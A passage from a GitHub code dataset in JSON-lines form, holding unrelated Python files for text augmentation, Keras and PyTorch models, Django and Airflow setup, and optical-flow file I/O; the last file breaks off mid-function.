words[np.random.randint(len(words))]\n synonyms = _get_synonyms(random_word, wordnet)\n counter += 1\n if counter > 3:\n return False\n\n random_synonym = synonyms[np.random.randint(len(synonyms))]\n ridx = np.random.randint(len(words))\n words.insert(ridx, random_synonym)\n\n return True\n\n\nclass EDA:\n def __init__(\n self,\n root_data_dir: str = \"./data\",\n p_sr: float = 0.25,\n p_ri: float = 0.25,\n p_rs: float = 0.25,\n p_rd: float = 0.25,\n alpha_sr: float = 0.1,\n alpha_ri: float = 0.1,\n alpha_rs: float = 0.1,\n alpha_rd: float = 0.1,\n num_aug: int = 9,\n ) -> None:\n self._wordnet = joblib.load(os.path.join(root_data_dir, \"wordnet.joblib\"))\n self._p_sr = p_sr\n self._p_ri = p_ri\n self._p_rs = p_rs\n self._p_rd = p_rd\n self._alpha_sr = alpha_sr\n self._alpha_ri = alpha_ri\n self._alpha_rs = alpha_rs\n self._alpha_rd = alpha_rd\n self._num_aug = num_aug\n\n def __call__(\n self,\n sentence: str,\n ) -> List[str]:\n sentence = _get_only_hangul(sentence)\n num_words = len(sentence.strip().split(\" \"))\n\n augmented_sentences = []\n num_new_per_technique = np.random.multinomial(\n self._num_aug,\n [self._p_sr, self._p_ri, self._p_rs, self._p_rd],\n )\n\n n_sr = max(1, int(self._alpha_sr * num_words))\n n_ri = max(1, int(self._alpha_ri * num_words))\n n_rs = max(1, int(self._alpha_rs * num_words))\n\n # sr\n for _ in range(num_new_per_technique[0]):\n a_sent = _synonym_replacement(sentence, self._wordnet, n_sr)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n # ri\n for _ in range(num_new_per_technique[1]):\n a_sent = _random_insertion(sentence, self._wordnet, n_ri)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n # rs\n for _ in range(num_new_per_technique[2]):\n a_sent = _random_swap(sentence, n_rs)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n # rd\n for _ in range(num_new_per_technique[3]):\n a_sent = _random_deletion(sentence, self._alpha_rd)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n if len(augmented_sentences) == 0:\n augmented_sentences.append(sentence)\n\n augmented_sentences = list(set(augmented_sentences))\n random.shuffle(augmented_sentences)\n\n return augmented_sentences\n","repo_name":"uoo723/BigStar-RnD-DA","sub_path":"src/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7132288091","text":"\"\"\"Base classes for supervised learning.\"\"\"\nimport importlib\nimport typing as t\nfrom dataclasses import dataclass\n\nimport datasets\nimport numpy as np\nfrom keras.layers import Layer\nfrom sklearn.metrics import classification_report\n\nfrom bnn_analysis.base.trainer import KerasTrainer\n\n\n@dataclass\nclass SupervisedDataSet:\n \"\"\"A dataset for supervised learning.\"\"\"\n\n x_train: np.ndarray\n y_train: np.ndarray\n x_test: np.ndarray\n y_test: np.ndarray\n\n @property\n def x_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the shape of the input data.\"\"\"\n return self.x_train.shape\n\n @property\n def y_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the shape of the output data.\"\"\"\n return self.y_train.shape\n\n def map_x(self, func: t.Callable[[np.ndarray], np.ndarray]) -> None:\n \"\"\"Apply a function to the input data.\"\"\"\n self.x_train = func(self.x_train)\n self.x_test = func(self.x_test)\n\n def map_y(self, func: t.Callable[[np.ndarray], np.ndarray]) -> None:\n \"\"\"Apply a function to the output data.\"\"\"\n self.y_train = func(self.y_train)\n self.y_test = func(self.y_test)\n\n\nclass HuggingFaceDataSet(SupervisedDataSet):\n \"\"\"A dataset for supervised learning using HuggingFace datasets.\"\"\"\n\n @classmethod\n def download(cls, name: str) -> datasets.DatasetDict:\n \"\"\"Download datasets from HuggingFace datasets.\n\n Args:\n name: Name of a dataset in HuggingFaceHub.\n\n Links:\n - https://huggingface.co/datasets\n\n \"\"\"\n return datasets.load_dataset(name) # type: ignore\n\n\nclass KerasDataSet(SupervisedDataSet):\n \"\"\"A dataset for supervised learning using Keras datasets.\"\"\"\n\n def __init__(self, name: str):\n \"\"\"Initialize the dataset.\n\n Args:\n name: Name of a submodule of keras.datasets.\n\n \"\"\"\n module = importlib.import_module(f\"keras.datasets.{name}\")\n train_data, test_data = module.load_data()\n super().__init__(*train_data, *test_data)\n\n\nclass SupervisedTrainer(KerasTrainer):\n \"\"\"Trains a keras model using its default fit method.\"\"\"\n\n def __init__(self, dataset: SupervisedDataSet):\n \"\"\"Initialize the trainer.\n\n Args:\n dataset: The dataset to train on.\n\n \"\"\"\n super().__init__()\n self.dataset = dataset\n\n @property\n def input_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the input shape of the dataset.\"\"\"\n shape = tuple(self.dataset.x_shape[1:])\n return shape\n\n @property\n def output_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the output shape of the dataset.\"\"\"\n if len(self.dataset.y_shape) == 1:\n return (1,)\n shape = tuple(self.dataset.y_shape[1:])\n return shape\n\n def _fit(self, **kwargs):\n \"\"\"Train the model.\"\"\"\n self.model.fit(\n self.dataset.x_train,\n self.dataset.y_train,\n validation_data=(self.dataset.x_test, self.dataset.y_test),\n **kwargs,\n )\n\n\nclass ClassificationTrainer(SupervisedTrainer):\n \"\"\"A trainer for classification models.\"\"\"\n\n def evaluate(self) -> t.Dict[str, t.Any]:\n \"\"\"Return classification reports for the model.\"\"\"\n report = classification_report(\n np.argmax(self.dataset.y_test, axis=1),\n np.argmax(self.model.predict(self.dataset.x_test), axis=1),\n output_dict=True,\n )\n return report\n\n\ndef train(\n dataset: SupervisedDataSet,\n layers: t.List[Layer],\n compile: t.Optional[dict] = None, # type: ignore # pylint: disable=W0622\n fit: t.Optional[dict] = None,\n problem: t.Optional[t.Literal[\"regression\", \"classification\"]] = None,\n) -> t.Optional[t.Dict[str, t.Any]]:\n \"\"\"Shortcut for building, compiling and fitting the model.\n\n Args:\n dataset: dataset to train on.\n layers: keras layers except the input layer.\n compile: model.compile kwargs.\n fit: model.fit kwargs.\n problem: problem type. If classification uses the ClassificationTrainer,\n otherwise SupervisedTrainer.\n\n Returns:\n Result of the evaluation method of the trainer.\n\n \"\"\"\n cls = ClassificationTrainer if problem == \"classification\" else SupervisedTrainer\n compile, fit = compile or {}, fit or {}\n trainer = cls(dataset)\n trainer.build(*layers, **compile)\n trainer.fit(**fit)\n return trainer.evaluate()\n","repo_name":"nickolasrm/TCC","sub_path":"bnn_analysis/base/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8002938942","text":"import models.blocks as B\nimport torch\nimport torch.nn as nn\n\n### Unet model\n\nclass RDNet(nn.Module):\n\n def __init__(self, in_ch=3, nf=16, res_n = 5, act_type='lrelu'):\n super(RDNet, self).__init__()\n\n ### Encoding\n self.f_ext0 = nn.Sequential(\n B.conv_block(in_nc=in_ch, out_nc=nf, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n self.f_ext1 = nn.Sequential(\n B.conv_block(in_nc=nf, out_nc=nf, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n\n\n ### Residual dense blocks\n self.rdbs = B.make_layer(B.ResidualDenseBlock_3C(nf), res_n)\n\n # self.RDB1 = B.ResidualDenseBlock_3C(nf)\n # self.RDB2 = B.ResidualDenseBlock_3C(nf)\n # self.RDB3 = B.ResidualDenseBlock_3C(nf)\n # self.RDB4 = B.ResidualDenseBlock_3C(nf)\n # self.RDB5 = B.ResidualDenseBlock_3C(nf)\n\n\n ### Feature recombination\n self.f_comb = nn.Sequential(\n B.conv_block(in_nc=nf*res_n, out_nc=nf, \\\n kernel_size=1, stride=1, padding=0, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n B.conv_block(in_nc=nf, out_nc=nf, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n ### Decoding\n self.dec = nn.Sequential(\n B.conv_block(in_nc=nf, out_nc=3, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n\n self.end_conv = nn.Conv2d(in_channels = nf, out_channels = in_ch, kernel_size = 1, stride = 1, padding = 0)\n\n def forward(self, x):\n\n idt = x\n h = self.f_ext0(x)\n grl = h\n h = self.f_ext1(h)\n\n ress = []\n for rdb in self.rdbs:\n h = rdb(h)\n ress.append(h)\n\n h = torch.cat(ress, 1)\n h = self.f_comb(h)\n\n h = self.dec(torch.add(h, grl))\n out = h + idt\n\n\n return out\n","repo_name":"TheZino/Laplacian-Encoder-Decoder-Raindrop-Removal","sub_path":"source/models/RDNet.py","file_name":"RDNet.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27347412204","text":"import numpy as np\nimport quaternion\n\n#i2 = j2 = k2 = ijk = -1\n\nquaternion(1, 0, 0, 0)\n\nq1 = np.quaternion(1,2,3,4)\nq2 = np.quaternion(5,6,7,8)\nq1 * q2\nquaternion(-60, 12, 30, 24)\na = np.array([q1, q2])\na\narray([quaternion(1, 2, 3, 4), quaternion(5, 6, 7, 8)],dtype=quaternion)\nexp(a)\narray([quaternion(1.69392, -0.78956, -1.18434, -1.57912),\n quaternion(138.909, -25.6861, -29.9671, -34.2481)], dtype=quaternion)\n\n# The following ufuncs are implemented:\n# add, subtract, multiply, divide, log, exp, power, negative, conjugate,\n# copysign, equal, not_equal, less, less_equal, isnan, isinf, isfinite,\n# absolute\n\n# Quaternion components are stored as doubles. The package could be extended\n# to support e.g. qfloat, qdouble, qlongdouble\n","repo_name":"fovtran/PyGame_samples","sub_path":"MyTools/Quaternion/quaternion_numpy.py","file_name":"quaternion_numpy.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72300973523","text":"from numbers import Real\n\n\ndef integer_check(arg_name: str, arg_value: int, min_value=None, max_value=None):\n \"\"\"validates that arg_value is an integer and can't be negative\"\"\"\n if not isinstance(arg_value, Real):\n raise TypeError(f\"{arg_name} must be an integer\")\n elif arg_value < 0:\n raise ValueError(f\"{arg_name} can't be negative\")\n elif (min_value is not None \n and arg_value < min_value\n ):\n raise ValueError(\n f\"{arg_name} cannot be less than {min_value} \"\n )\n elif (max_value is not None \n and arg_value > max_value\n ):\n raise ValueError(\n f\"{arg_name} cannot be more than {max_value} \"\n )\n else:\n return arg_value\n","repo_name":"juliashal/Python---Deep-Dive-course","sub_path":"Part 4 - OOP/Single Inheritance/app/utils/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31871050700","text":"import json\n\nTYPE = ('signup', 'login', 'logout', 'command', 'request', 'management', 'show')\n'''\n{type: '', data: ''}\nxen handler --> instance 생성 시 instance id db에 저장\n\nsignup --> id, password \nlogin --> id, password\nlogout --> id, session ------------from client to relay\ncommand --> category(create, modify, delete, run, stop), session(key = session), detail(id포함)/ run, stop\n--> uuid or instance name\ninfo\nrequest\n'''\n\n\ndef get_type(req_type):\n\treturn TYPE.index(req_type)\n\n#data:list -- accept : data == session\ndef encapsulate(request_type, data, session=''):\n\tdata_unit = {'type':'' ,'data':{}}\n\tdata_unit['type'] = request_type\n\treq_num = get_type(request_type)\n\t#key 값이 없을 경우 예외처리\n\tif req_num == 0 or req_num == 1: \n\t\tdata_unit['data']['id'] = data[0]\n\t\tdata_unit['data']['password'] = data[1]\n\telif req_num == 2:\n\t\tdata_unit['data']['id'] = data[0]\n\telif req_num == 3:\n\t\t#command\n\t\tdata_unit['data']['category'] = data[0]\n\t\tdata_unit['data']['detail'] = data[1]#dict e.g., {cpu:asdf, mem:asdf, size:asdf...}\n\t\tdata_unit['data']['session'] = session\n\telif req_num == 4:\n\t\t#accept\n\t\tdata_unit['data']['id'] = data[0]\n\t\tdata_unit['data']['session'] = session#data[1]\n\telif req_num == 5 or req_num == 6:\n\t\tdata_unit['data']['cpu'] = data[0]\n\t\tdata_unit['data']['mem'] = data[1]\n\t\tdata_unit['data']['network'] = data[2]#tuple\n\t\tdata_unit['data']['bd'] = data[3]#tuple\n\n\tdata_unit['session'] = session\n\treturn data_unit\n\ndef extract(data_unit):\n\t#request_type : str\n\trequest_type = data_unit['type']\n\t#data : dict\n\tdata = data_unit['data']\n\t\n\treturn request_type, data\n\n\n\n","repo_name":"Greenun/NetProject","sub_path":"RelayServer/transfer_unit.py","file_name":"transfer_unit.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29540461528","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.utils.html import format_html\n\nfrom boats.models import Boat, Image\n\n\nclass ImageInline(admin.StackedInline):\n model = Image\n extra = 1\n ordering = ('ordering',)\n exclude = ('ordering',)\n\n\nclass BoatAdmin(admin.ModelAdmin):\n inlines = [ImageInline]\n ordering = ('order',)\n list_display = ('id', '__unicode__', 'boat_actions')\n list_display_links = ('__unicode__',)\n readonly_fields = ('boat_actions',)\n\n def get_urls(self):\n urls = super(BoatAdmin, self).get_urls()\n custom_urls = [\n url(r'^(?P.+)/move-up/$', self.admin_site.admin_view(self.move_up), name='boat-move-up'),\n url(r'^(?P.+)/move-down/$', self.admin_site.admin_view(self.move_down), name='boat-move-down'),\n ]\n return custom_urls + urls\n\n def boat_actions(self, obj):\n return format_html(\n 'Move Up '\n 'Move Down',\n reverse('admin:boat-move-up', args=[obj.pk]),\n reverse('admin:boat-move-down', args=[obj.pk]),\n )\n boat_actions.short_description = 'Actions'\n boat_actions.allow_tags = True\n\n def move_up(self, request, boat_id):\n boat = Boat.objects.get(id=boat_id)\n boat.move_order_up()\n return HttpResponseRedirect(reverse('admin:boats_boat_changelist'))\n\n def move_down(self, request, boat_id):\n boat = Boat.objects.get(id=boat_id)\n boat.move_order_down()\n return HttpResponseRedirect(reverse('admin:boats_boat_changelist'))\n\n\nadmin.site.register(Boat, BoatAdmin)\n","repo_name":"ClassicBoatsNJ/cbnj-django","sub_path":"boats/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17299280444","text":"from airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\n\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'start_date': datetime(2022, 1, 1),\n 'owner': 'Airflow'\n}\n\ndef first_task():\n print('This is first task')\n\ndef second_task():\n print('This is second task')\n\ndef third_task():\n print('This is third task')\n\nwith DAG(dag_id='depends_on_past', schedule_interval= \"0 0 * * *\", default_args=default_args,tags=['basic_dags'],catchup=True) as dag:\n \n task_1 = PythonOperator(task_id='task_1', python_callable=first_task)\n \n task_2 = PythonOperator(task_id='task_2', python_callable=second_task, depends_on_past=True)\n\n task_3 = PythonOperator(task_id='task_3', python_callable=third_task)\n\n task_1 >> task_2 >> task_3","repo_name":"technoavengers/airflow-training","sub_path":"dags/basic_dags/depends_on_past.py","file_name":"depends_on_past.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32588640409","text":"from _util_202303 import sys_cmd, prCyan, api_upscale\r\nfrom _util_openai import zh_txt_2_en_txt, zh_txt_2_en_prompt\r\n\r\n_txt_out_dir = \"F:\\\\_workflow\\\\tmp\\\\test\"\r\n_img_out_dir = \"F:\\\\_workflow\\\\tmp\\\\test\"\r\n\r\n_user_conf_json = [\r\n # 'ci-i2i-user-i2i-ctrl-bj.json',\r\n 'ci-i2i-user-i2i-ctrl-xg.json',\r\n # 'ci-i2i-user-i2i-ctrl-fg.json',\r\n # 'ci-i2i-user-i2i.json',\r\n # 'ci-i2i-user-t2i-ctrl-kl.json',\r\n # 'ci-i2i-user-t2i.json',\r\n]\r\n\r\n# for i in _user_conf_json:\r\n# cmd_ci_i2i = f\"python ci-i2i-202303.py -txtoutdir {_txt_out_dir} -imgoutdir {_img_out_dir} -userconf {i}\"\r\n# prCyan(cmd_ci_i2i)\r\n# sys_cmd(cmd_ci_i2i)\r\n\r\n# api_upscale(\"F:\\\\_workflow\\\\tmp\\\\test\\\\xg_sd1_00_1678872845_0.png\")\r\n\r\n# print(isChinese('测试'))\r\n\r\n_txt = \", ty3Dbear, 考拉在公园里放风筝\"\r\n\r\n# _txt = \"\"\"Ignore previous instructions. As a stable-diffusion prompt engineer, you need to write stable-diffusion prompts. The basic rule is that the most important keywords are at the beginning and then every additional keywords are separated by a comma. If you add an art style by an artist or multiple artists, this information should always be at the end.\r\n# For example, if you need to write a prompt of an image of cartoon character for kids, you probable write is as \r\n# \"very cute kid's film character, disney pixar zootopia character concept artwork, 3d concept, high detail iconic character for upcoming film, trending on artstation, character design, 3d artistic render, highly detailed, cartoon\"\r\n# By using a similar syntax, please write me a clean and precise prompt an image of content for kids.\"\"\"\r\n\r\n\r\n# {{Prompt}}, anthro, very cute kid's film character, disney pixar zootopia character concept artwork, 3d concept, detailed fur, high detail iconic character for upcoming film, trending on artstation, character design, 3d artistic render, highly detailed, octane, blender, cartoon, shadows, lighting\r\n\r\n\r\n\r\nprint(zh_txt_2_en_prompt(_txt))\r\nprint(zh_txt_2_en_txt(_txt))\r\n\r\n","repo_name":"yiouyou/ty_workflow","sub_path":"ci-i2i-202303/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40226077809","text":"import sys\nimport glob\nimport time\nimport datetime\nfrom pathlib import Path\nfrom collections import deque, Counter\nimport cv2\nimport re\nimport gzip\nimport pickle\nimport io\nimport numpy as np\nimport einops\nimport os\nimport torch\nfrom PIL import Image\nfrom PIL.PngImagePlugin import PngInfo\nimport shutil\nfrom MFT.utils.misc import ensure_numpy\nimport tqdm\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_frames(path):\n paths = glob.glob(f'{path}/*.jpg')\n return sorted([Path(path) for path in paths])\n\n\ndef video_seek_frame(time_string, fps=30):\n parsed_time = time.strptime(time_string, \"%H:%M:%S\")\n delta = datetime.timedelta(hours=parsed_time.tm_hour, minutes=parsed_time.tm_min, seconds=parsed_time.tm_sec)\n time_seconds = int(delta.total_seconds())\n pos = fps * time_seconds\n return pos\n\n\ndef video_seek_frame_name(query_frame_name, frame_paths):\n frame_names = [path.stem for path in frame_paths]\n regexp = re.compile(r'0*' + query_frame_name)\n for i, name in enumerate(frame_names):\n if re.match(regexp, name):\n return i\n raise ValueError(f\"Frame {query_frame_name} not found.\")\n\n\ndef frames_from_time(directory, time_string, fps=30):\n frames = get_frames(directory)\n start_index = video_seek_frame(time_string, fps)\n\n for i in range(start_index, len(frames)):\n yield (frames[i], cv2.imread(str(frames[i])))\n\n\ndef frames_from_name(directory, start_name):\n frames = get_frames(directory)\n start_index = video_seek_frame_name(start_name, frames)\n\n for i in range(start_index, len(frames)):\n yield (frames[i], cv2.imread(str(frames[i])))\n\n\nclass LookaheadIter:\n\n def __init__(self, it):\n self._iter = iter(it)\n self._ahead = deque()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._ahead:\n return self._ahead.popleft()\n else:\n return next(self._iter)\n\n def lookahead(self):\n for x in self._ahead:\n yield x\n for x in self._iter:\n self._ahead.append(x)\n yield x\n\n def peek(self, *a):\n return next(iter(self.lookahead()), *a)\n\n\ndef load_maybe_gzipped_pkl(path):\n suffix = Path(path).suffix\n if suffix == '.pklz':\n open_fn = gzip.open\n elif suffix == '.pkl':\n open_fn = open\n else:\n ValueError(f\"Unknown pickle file suffix ({suffix}).\")\n\n with open_fn(path, 'rb') as fin:\n data = pickle.load(fin)\n\n return data\n\n\nclass CPU_Unpickler(pickle.Unpickler):\n \"\"\" https://github.com/pytorch/pytorch/issues/16797#issuecomment-633423219\n I have pickled something in meta as a GPU tensor...\"\"\"\n\n def find_class(self, module, name):\n import torch\n\n if module == 'torch.storage' and name == '_load_from_bytes':\n return lambda b: torch.load(io.BytesIO(b), map_location='cpu')\n else:\n return super().find_class(module, name)\n\n\ndef load_cpu_pickle(path):\n if not Path(path).exists():\n raise FileNotFoundError(f\"No pickle at {path}\")\n try:\n exception = gzip.BadGzipFile # new in python 3.8\n except AttributeError:\n exception = OSError\n\n try:\n with gzip.open(path, 'rb') as fin:\n unpickler = CPU_Unpickler(fin)\n data = unpickler.load()\n except exception: # we didn't compress this one...\n with open(path, 'rb') as fin:\n unpickler = CPU_Unpickler(fin)\n data = unpickler.load()\n return data\n\n\ndef read_flow_png(path):\n \"\"\"Read png-compressed flow\n\n Args:\n path: png flow file path\n\n Returns:\n flow: (H, W, 2) float32 numpy array (delta-x, delta-y)\n valid: (H, W) float32 numpy array\n \"\"\"\n # to specify not to change the image depth (16bit)\n flow = cv2.imread(str(path), cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR)\n flow = flow[:, :, ::-1].astype(np.float32)\n # flow shape (H, W, 2) valid shape (H, W)\n flow, valid = flow[:, :, :2], flow[:, :, 2]\n flow = (flow - 2**15) / 32.0\n return flow, valid\n\n\ndef write_flow_png(path, flow, valid=None):\n \"\"\"Write a compressed png flow\n\n Args:\n path: write path\n flow: (H, W, 2) xy-flow\n valid: None, or (H, W) array with validity mask\n \"\"\"\n flow = 32.0 * flow + 2**15 # compress (resolution step 1/32, maximal flow 1024 (same as Sintel width))\n if valid is None:\n valid = np.ones([flow.shape[0], flow.shape[1], 1])\n else:\n valid = einops.rearrange(valid, 'H W -> H W 1', **einops.parse_shape(flow, 'H W _'))\n data = np.concatenate([flow, valid], axis=2).astype(np.uint16)\n cv2.imwrite(str(path), data[:, :, ::-1])\n\n\n# flow is encoded with sign, so 2**15, occlusion and uncertainty without sign, so 2**16:\nFLOWOU_IO_FLOW_MULTIPLIER = 2**5 # max-abs-val = 2**(15-5) = 1024, step = 2**(-5) = 0.03\nFLOWOU_IO_OCCLUSION_MULTIPLIER = 2**15 # max-val = 2**(16-15) = 2, step = 2**(-15) = 3e-5\nFLOWOU_IO_UNCERTAINTY_MULTIPLIER = 2**9 # max-val = 2**(16-9) = 128, step = 2**(-9) = 0.0019\n\n\ndef write_flowou(path, flow, occlusions, uncertainty):\n \"\"\"Write a compressed png flow, occlusions and uncertainty\n\n Args:\n path: write path (must have \".flowou.png\", \".flowouX16.pkl\", or \".flowouX32.pkl\" suffix)\n flow: (2, H, W) xy-flow\n occlusions: (1, H, W) array with occlusion scores (1 = occlusion, 0 = visible)\n uncertainty: (1, H, W) array with uncertainty sigma\n \"\"\"\n suf = Path(path).suffixes[0]\n if suf == '.flowou':\n write_flowou1_png(path, flow, occlusions, uncertainty)\n elif suf == '.flowouX16':\n write_flowou_X16(path, flow, occlusions, uncertainty)\n elif suf == '.flowouX32':\n write_flowou_X32(path, flow, occlusions, uncertainty)\n elif suf == '.stepan16':\n write_flowou_stepan16(path, flow, occlusions, uncertainty)\n else:\n raise ValueError(f\"Incorrect flowou path suffix: {Path(path).suffixes}\")\n\n\ndef read_flowou(path):\n \"\"\"Read png-compressed flow, occlusions and uncertainty\n\n Args:\n path: \".flowou.png\", \".flowouX16.pkl\", or \".flowouX32.pkl\" file path\n\n Returns:\n flow: (2, H, W) float32 numpy array (delta-x, delta-y)\n occlusions: (1, H, W) float32 array with occlusion scores (1 = occlusion, 0 = visible)\n uncertainty: (1, H, W) float32 array with uncertainty sigma (0 = dirac)\n \"\"\"\n suf = Path(path).suffixes[0]\n if suf == '.flowou':\n return read_flowou1_png(path)\n elif suf == '.flowouX16':\n return read_flowou_X16(path)\n elif suf == '.flowouX32':\n return read_flowou_X32(path)\n else:\n raise ValueError(f\"Incorrect flowou path suffix: {Path(path).suffixes}\")\n\n\ndef write_flowou1_png(path, flow, occlusions, uncertainty):\n \"\"\"Write a compressed png flow, occlusions and uncertainty\n\n Args:\n path: write path (must have \".flowou.png\" suffix)\n flow: (2, H, W) xy-flow\n occlusions: (1, H, W) array with occlusion scores (1 = occlusion, 0 = visible), clipped between 0 and 1\n uncertainty: (1, H, W) array with uncertainty sigma, clipped between 0 and 2047\n (0 = dirac, max observed on Sintel = 215, Q0.999 on sintel ~ 15)\n \"\"\"\n def encode_central(xs, multiplier=32.0):\n max_val = 2**15 / multiplier\n assert np.all(np.abs(xs) < max_val), \"out-of-range values - cannot be written\"\n return 2**15 + multiplier * xs\n\n def encode_positive(xs, multiplier=32.0):\n max_val = 2**16 / multiplier\n assert np.all(xs >= 0), \"out-of-range values - cannot be written\"\n assert np.all(xs < max_val), \"out-of-range values - cannot be written\"\n return multiplier * xs\n\n assert Path(path).suffixes == ['.flowou', '.png']\n path.parent.mkdir(parents=True, exist_ok=True)\n einops.parse_shape(flow, 'H W xy')\n flow = encode_central(einops.rearrange(flow, 'xy H W -> H W xy', xy=2),\n multiplier=FLOWOU_IO_FLOW_MULTIPLIER)\n\n occlusions = np.clip(occlusions, 0, 1)\n occlusions = encode_positive(einops.rearrange(occlusions, '1 H W -> H W 1', **einops.parse_shape(flow, 'H W _')),\n multiplier=FLOWOU_IO_OCCLUSION_MULTIPLIER)\n\n uncertainty = np.clip(uncertainty, 0, 127)\n uncertainty = encode_positive(einops.rearrange(uncertainty, '1 H W -> H W 1', **einops.parse_shape(flow, 'H W _')),\n multiplier=FLOWOU_IO_UNCERTAINTY_MULTIPLIER)\n\n data = np.concatenate([flow, occlusions, uncertainty], axis=2).astype(np.uint16)\n cv2.imwrite(str(path), data)\n\n\ndef read_flowou1_png(path):\n \"\"\"Read png-compressed flow, occlusions and uncertainty\n\n Args:\n path: \".flowou.png\" file path\n\n Returns:\n flow: (2, H, W) float32 numpy array (delta-x, delta-y)\n occlusions: (1, H, W) float32 array with occlusion scores (1 = occlusion, 0 = visible)\n uncertainty: (1, H, W) float32 array with uncertainty sigma (0 = dirac)\n \"\"\"\n # to specify not to change the image depth (16bit)\n assert Path(path).suffixes == ['.flowou', '.png']\n\n def decode_central(xs, multiplier=32.0):\n return (xs.astype(np.float32) - 2**15) / multiplier\n\n def decode_positive(xs, multiplier=32.0):\n return xs.astype(np.float32) / multiplier\n\n data = cv2.imread(str(path), cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED)\n data = einops.rearrange(data, 'H W C -> C H W', C=4)\n flow, occlusions, uncertainty = data[:2, :, :], data[2, :, :], data[3, :, :]\n occlusions = einops.rearrange(occlusions, 'H W -> 1 H W')\n uncertainty = einops.rearrange(uncertainty, 'H W -> 1 H W')\n flow = decode_central(flow, multiplier=FLOWOU_IO_FLOW_MULTIPLIER)\n occlusions = decode_positive(occlusions, multiplier=FLOWOU_IO_OCCLUSION_MULTIPLIER)\n uncertainty = decode_positive(uncertainty, multiplier=FLOWOU_IO_UNCERTAINTY_MULTIPLIER)\n return flow, occlusions, uncertainty\n\n\ndef write_flowou2_png(path, flow, occlusions, uncertainty):\n \"\"\"Write a compressed png flow, occlusions and uncertainty, with a variable min-max range\n\n Args:\n path: write path (must have \".flowou2.png\" suffix)\n flow: (2, H, W) xy-flow\n occlusions: (1, H, W) array with occlusion scores (1 = occlusion, 0 = visible), clipped between 0 and 1\n uncertainty: (1, H, W) array with uncertainty sigma, clipped between 0 and 2047\n (0 = dirac, max observed on Sintel = 215, Q0.999 on sintel ~ 15)\n \"\"\"\n def encode(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n\n uint16_xs = np.uint16(xs_01 * (2**16 - 1))\n return uint16_xs, lb, ub\n\n assert Path(path).suffixes == ['.flowou2', '.png']\n path.parent.mkdir(parents=True, exist_ok=True)\n einops.parse_shape(flow, 'H W xy')\n flow, flow_min, flow_max = encode(einops.rearrange(flow, 'xy H W -> H W xy', xy=2))\n\n occlusions, occl_min, occl_max = encode(einops.rearrange(occlusions, '1 H W -> H W 1',\n **einops.parse_shape(flow, 'H W _')))\n\n uncertainty, unc_min, unc_max = encode(einops.rearrange(uncertainty, '1 H W -> H W 1',\n **einops.parse_shape(flow, 'H W _')))\n\n data = np.concatenate([flow, occlusions, uncertainty], axis=2)\n pil_data = Image.fromarray(data)\n metadata = PngInfo()\n metadata.add_text(\"flow_min\", str(flow_min))\n metadata.add_text(\"flow_max\", str(flow_max))\n\n metadata.add_text(\"occl_min\", str(occl_min))\n metadata.add_text(\"occl_max\", str(occl_max))\n\n metadata.add_text(\"unc_min\", str(unc_min))\n metadata.add_text(\"unc_max\", str(unc_max))\n pil_data.save(str(path), pnginfo=metadata)\n\n\ndef read_flowou2_png(path):\n \"\"\"Read png-compressed flow, occlusions and uncertainty, with a variable min-max range\n\n Args:\n path: \".flowou2.png\" file path\n\n Returns:\n flow: (2, H, W) float32 numpy array (delta-x, delta-y)\n occlusions: (1, H, W) float32 array with occlusion scores (1 = occlusion, 0 = visible)\n uncertainty: (1, H, W) float32 array with uncertainty sigma (0 = dirac)\n \"\"\"\n # to specify not to change the image depth (16bit)\n assert Path(path).suffixes == 